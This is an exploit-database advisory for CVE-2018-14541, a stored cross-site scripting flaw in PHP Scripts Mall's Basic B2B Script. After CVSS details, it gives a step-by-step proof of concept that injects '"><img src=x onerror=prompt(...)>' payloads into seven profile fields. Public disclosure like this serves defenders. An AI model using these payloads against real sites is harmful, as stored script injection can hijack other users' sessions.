Basic B2B Script 2.0.0 Cross-Site Scripting

2018.08.03
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

******************************************************************************************* # Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. # Date: 20.07.2018 # Site Titel : B2B Script # Vendor Homepage: https://www.phpscriptsmall.com/ #Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/ # Software Link: http://readymadeb2bscript.com/basic-b2b/ # Category: Web Application # Version: 2.0.9 # Exploit Author: Vikas Chaudhary # Contact: https://www.facebook.com/profile.php?id=100011287630308 # Web: https://gkaim.com/ #Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/ # Tested on: Windows 10 -Firefox # CVE- CVE-2018-14541 ***************************************************************************************** Proof of Concept:- -------------------------- 1. Go to the site (https://www.server.com/professional-b2b-script/ ). 2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on ... 3- Goto your mail and Verify it. 4-Come back to site and Login using your Verified Mail and Password. 6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter. in FIRST NAME => "><img src=x onerror=prompt(/VIKAS/)> in LAST NAME => "><img src=x onerror=prompt(/CHAUDHARY/)> in ADDRESS 1 => "><img src=x onerror=prompt(/MYAIM/)> in ADDRESS 2 => "><img src=x onerror=prompt(/GKAIM/)> in CITY => "><img src=x onerror=prompt(/HRFP/)> in STATE => "><img src=x onerror=prompt(/ETHICAL/)> in COMPANY NAME => "><img src=x onerror=prompt(/HACKER/)> Now click on SUBMIT and refresh the page You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/ in you account.. ***************************************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top